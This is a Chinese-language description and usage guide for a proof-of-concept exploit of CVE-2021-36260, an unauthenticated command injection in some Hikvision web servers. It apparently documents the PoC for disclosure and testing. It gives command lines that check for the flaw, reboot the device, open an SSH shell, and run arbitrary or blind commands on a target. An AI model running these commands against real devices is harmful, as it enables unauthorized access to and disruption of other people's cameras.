CVE-2021-36260 POC 命令注入漏洞,存在于某些海康威视产品的Web服务器中。由于输入验证不足,攻击者可利用该漏洞,通过发送带有恶意命令的消息来发起命令注入攻击。
漏洞标题: Hikvision Web Server Build 210702 - Command Injection
漏洞作者: bashis
厂商主页: https://www.hikvision.com/
版本: 1.0
CVE: CVE-2021-36260
参考: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
注意:
[Examples] 安全漏洞/验证检测: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check
安全和非安全漏洞/验证检测: (仅当未通过'安全检测'验证时,才使用'不安全检测') $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot
不安全漏洞/验证检测: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot
启动并连接到SSH Shell: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell
执行命令: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd "ls -l"
执行盲命令: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind "reboot"